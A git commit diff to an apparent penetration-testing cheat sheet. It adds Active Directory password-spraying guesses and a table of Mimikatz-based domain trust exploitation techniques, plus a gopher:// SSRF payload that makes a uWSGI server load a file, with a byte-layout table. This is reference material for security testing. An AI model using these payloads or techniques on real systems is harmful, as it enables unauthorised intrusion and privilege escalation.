SSRF exploiting WSGI

This commit is contained in:
Swissky 2020-01-05 22:11:28 +01:00
parent 3a9b9529cb
commit 71171fa78b
2 changed files with 52 additions and 4 deletions

View File

@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are :
- Password123
- Welcome1
- Password123, mimikatz
- Welcome1/Welcome01
- $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*
- SeasonYear : Winter2019*,Spring2020!,Summer2018?
- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
#### Kerberos pre-auth bruteforcing
@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
### Trust relationship between domains
* One-way
* Domain B trusts A
* Users in Domain A can access resources in Domain B
* Users in Domain B cannot access resources in Domain A
* Two-way
* Domain A trusts Domain B
* Domain B trusts Domain A
* Authentication requests can be passed between the two domains in both directions
#### Enumerate trusts between domains
```powershell
nltest /trusted_domains
```
@ -1047,6 +1058,19 @@ SourceName TargetName TrustType TrustDirection
domainA.local domainB.local TreeRoot Bidirectional
```
#### Exploit trusts between domains
:warning: Require a Domain-Admin level access to the current domain.
| Source | Target | Technique to use | Trust relationship |
|---|---|---|---|
| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) |
| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) |
| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) |
| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) |
### Child Domain to Forest Compromise - SID Hijacking
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
@ -1498,4 +1522,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
* [SMB Share SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [A Red Teamers Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
* [A Red Teamers Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0)

View File

@ -29,6 +29,7 @@
* [ldap://](#ldap)
* [gopher://](#gopher)
* [netdoc://](#netdoc)
* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)
* [SSRF to XSS](#ssrf-to-xss)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters.
ssrf.php?url=gopher://127.0.0.1:4242/DATA
```
## SSRF exploiting WSGI
Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.
```powershell
gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py
```
| Header | | |
|-----------|-----------|-------------|
| modifier1 | (1 byte) | 0 (%00) |
| datasize | (2 bytes) | 26 (%1A%00) |
| modifier2 | (1 byte) | 0 (%00) |
| Variable (UWSGI_FILE) | | | | |
|-----------------------|-----------|----|------------|---|
| key length | (2 bytes) | 10 | (%0A%00) | |
| key data | (m bytes) | | UWSGI_FILE | |
| value length | (2 bytes) | 12 | (%0C%00) | |
| value data | (n bytes) | | /tmp/test.py | |
## SSRF to XSS
by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)